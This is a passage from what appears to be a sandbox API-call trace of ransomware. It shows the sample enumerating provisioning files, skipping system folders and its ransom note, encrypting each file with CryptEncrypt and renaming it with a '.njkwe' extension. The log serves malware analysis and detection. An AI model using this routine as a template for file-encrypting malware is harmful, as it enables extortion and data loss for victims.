| out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.746] GetProcessHeap () returned 0xbe0000 [0077.746] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.747] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x28a, lpOverlapped=0x0) returned 1 [0077.757] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd76, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.757] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x28a, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x28a, lpOverlapped=0x0) returned 1 [0077.757] GetProcessHeap () returned 0xbe0000 [0077.757] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.757] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.757] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.757] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.757] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.757] CloseHandle (hObject=0x43c) returned 1 [0077.757] GetProcessHeap () returned 0xbe0000 [0077.757] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.757] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\262__Connections_Cellular_Timecel (Malaysia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 182 [0077.757] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\262__Connections_Cellular_Timecel (Malaysia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\262__connections_cellular_timecel (malaysia)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\262__Connections_Cellular_Timecel (Malaysia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\262__connections_cellular_timecel (malaysia)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.758] GetProcessHeap () returned 0xbe0000 [0077.758] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.758] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x909e1a7e, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x909e1a7e, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x909e1a7e, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c4, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="263__Connections_Cellular_U Mobile (Malaysia)_i0$(__MVID)@WAP.provxml", cAlternateFileName="263__C~1.PRO")) returned 1 [0077.758] lstrcmpiW (lpString1="263__Connections_Cellular_U Mobile (Malaysia)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.758] lstrcmpiW (lpString1="263__Connections_Cellular_U Mobile (Malaysia)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.758] lstrcmpiW (lpString1="263__Connections_Cellular_U Mobile (Malaysia)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.758] lstrcmpiW (lpString1="263__Connections_Cellular_U Mobile (Malaysia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.758] lstrcmpiW (lpString1="263__Connections_Cellular_U Mobile (Malaysia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.758] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\263__Connections_Cellular_U Mobile (Malaysia)_i0$(__MVID)@WAP.provxml") returned 163 [0077.758] StrStrIW (lpFirst="263__Connections_Cellular_U Mobile (Malaysia)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.758] lstrcmpW (lpString1="263__Connections_Cellular_U Mobile (Malaysia)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.758] lstrcmpW (lpString1="263__Connections_Cellular_U Mobile (Malaysia)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.758] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\263__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.758] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\263__Connections_Cellular_U Mobile (Malaysia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\263__connections_cellular_u mobile (malaysia)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.759] GetTickCount () returned 0x1153c59 [0077.759] GetTickCount () returned 0x1153c59 [0077.759] GetTickCount () returned 0x1153c59 [0077.759] GetTickCount () returned 0x1153c59 [0077.759] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.759] GetProcessHeap () returned 0xbe0000 [0077.759] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.759] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2c4, lpOverlapped=0x0) returned 1 [0077.764] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd3c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.764] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2c4, lpOverlapped=0x0) returned 1 [0077.764] GetProcessHeap () returned 0xbe0000 [0077.764] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.764] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.764] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.764] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.764] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.764] CloseHandle (hObject=0x43c) returned 1 [0077.764] GetProcessHeap () returned 0xbe0000 [0077.764] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.764] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\263__Connections_Cellular_U Mobile (Malaysia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 183 [0077.764] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\263__Connections_Cellular_U Mobile (Malaysia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\263__connections_cellular_u mobile (malaysia)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\263__Connections_Cellular_U Mobile (Malaysia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\263__connections_cellular_u mobile (malaysia)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.765] GetProcessHeap () returned 0xbe0000 [0077.765] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.765] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x909e1a7e, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x909e1a7e, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x909e1a7e, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x285, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="264__Connections_Cellular_Go Mobile (Malta)_i0$(__MVID)@WAP.provxml", cAlternateFileName="264__C~1.PRO")) returned 1 [0077.765] lstrcmpiW (lpString1="264__Connections_Cellular_Go Mobile (Malta)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.765] lstrcmpiW (lpString1="264__Connections_Cellular_Go Mobile (Malta)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.765] lstrcmpiW (lpString1="264__Connections_Cellular_Go Mobile (Malta)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.765] lstrcmpiW (lpString1="264__Connections_Cellular_Go Mobile (Malta)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.765] lstrcmpiW (lpString1="264__Connections_Cellular_Go Mobile (Malta)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.765] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\264__Connections_Cellular_Go Mobile (Malta)_i0$(__MVID)@WAP.provxml") returned 161 [0077.765] StrStrIW (lpFirst="264__Connections_Cellular_Go Mobile (Malta)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.765] lstrcmpW (lpString1="264__Connections_Cellular_Go Mobile (Malta)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.765] lstrcmpW (lpString1="264__Connections_Cellular_Go Mobile (Malta)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.765] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\264__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.766] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\264__Connections_Cellular_Go Mobile (Malta)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\264__connections_cellular_go mobile (malta)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.766] GetTickCount () returned 0x1153c69 [0077.766] GetTickCount () returned 0x1153c69 [0077.766] GetTickCount () returned 0x1153c69 [0077.766] GetTickCount () returned 0x1153c69 [0077.766] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.766] GetProcessHeap () returned 0xbe0000 [0077.766] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.766] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x285, lpOverlapped=0x0) returned 1 [0077.772] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.772] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x285, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x285, lpOverlapped=0x0) returned 1 [0077.772] GetProcessHeap () returned 0xbe0000 [0077.772] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.772] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.772] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.772] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.772] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.772] CloseHandle (hObject=0x43c) returned 1 [0077.772] GetProcessHeap () returned 0xbe0000 [0077.772] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.772] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\264__Connections_Cellular_Go Mobile (Malta)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 181 [0077.772] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\264__Connections_Cellular_Go Mobile (Malta)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\264__connections_cellular_go mobile (malta)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\264__Connections_Cellular_Go Mobile (Malta)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\264__connections_cellular_go mobile (malta)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.773] GetProcessHeap () returned 0xbe0000 [0077.773] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.773] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x909e1a7e, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x909e1a7e, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x909e1a7e, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x284, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="265__Connections_Cellular_Go Mobile (Malta)_i1$(__MVID)@WAP.provxml", cAlternateFileName="265__C~1.PRO")) returned 1 [0077.773] lstrcmpiW (lpString1="265__Connections_Cellular_Go Mobile (Malta)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.773] lstrcmpiW (lpString1="265__Connections_Cellular_Go Mobile (Malta)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.773] lstrcmpiW (lpString1="265__Connections_Cellular_Go Mobile (Malta)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.773] lstrcmpiW (lpString1="265__Connections_Cellular_Go Mobile (Malta)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.773] lstrcmpiW (lpString1="265__Connections_Cellular_Go Mobile (Malta)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.773] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\265__Connections_Cellular_Go Mobile (Malta)_i1$(__MVID)@WAP.provxml") returned 161 [0077.773] StrStrIW (lpFirst="265__Connections_Cellular_Go Mobile (Malta)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.773] lstrcmpW (lpString1="265__Connections_Cellular_Go Mobile (Malta)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.773] lstrcmpW (lpString1="265__Connections_Cellular_Go Mobile (Malta)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.773] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\265__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.773] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\265__Connections_Cellular_Go Mobile (Malta)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\265__connections_cellular_go mobile (malta)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.774] GetTickCount () returned 0x1153c69 [0077.774] GetTickCount () returned 0x1153c69 [0077.774] GetTickCount () returned 0x1153c69 [0077.774] GetTickCount () returned 0x1153c69 [0077.774] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.774] GetProcessHeap () returned 0xbe0000 [0077.774] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.774] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x284, lpOverlapped=0x0) returned 1 [0077.779] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd7c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.779] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x284, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x284, lpOverlapped=0x0) returned 1 [0077.780] GetProcessHeap () returned 0xbe0000 [0077.780] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.780] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.780] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.780] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.780] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.780] CloseHandle (hObject=0x43c) returned 1 [0077.780] GetProcessHeap () returned 0xbe0000 [0077.780] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.780] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\265__Connections_Cellular_Go Mobile (Malta)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 181 [0077.780] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\265__Connections_Cellular_Go Mobile (Malta)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\265__connections_cellular_go mobile (malta)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\265__Connections_Cellular_Go Mobile (Malta)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\265__connections_cellular_go mobile (malta)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.781] GetProcessHeap () returned 0xbe0000 [0077.781] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.781] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90a07ce9, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90a07ce9, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90a07ce9, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x353, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="266__Connections_Cellular_Vodafone Malta (Malta)_i0$(__MVID)@WAP.provxml", cAlternateFileName="266__C~1.PRO")) returned 1 [0077.781] lstrcmpiW (lpString1="266__Connections_Cellular_Vodafone Malta (Malta)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.781] lstrcmpiW (lpString1="266__Connections_Cellular_Vodafone Malta (Malta)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.781] lstrcmpiW (lpString1="266__Connections_Cellular_Vodafone Malta (Malta)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.781] lstrcmpiW (lpString1="266__Connections_Cellular_Vodafone Malta (Malta)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.781] lstrcmpiW (lpString1="266__Connections_Cellular_Vodafone Malta (Malta)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.781] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\266__Connections_Cellular_Vodafone Malta (Malta)_i0$(__MVID)@WAP.provxml") returned 166 [0077.781] StrStrIW (lpFirst="266__Connections_Cellular_Vodafone Malta (Malta)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.781] lstrcmpW (lpString1="266__Connections_Cellular_Vodafone Malta (Malta)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.781] lstrcmpW 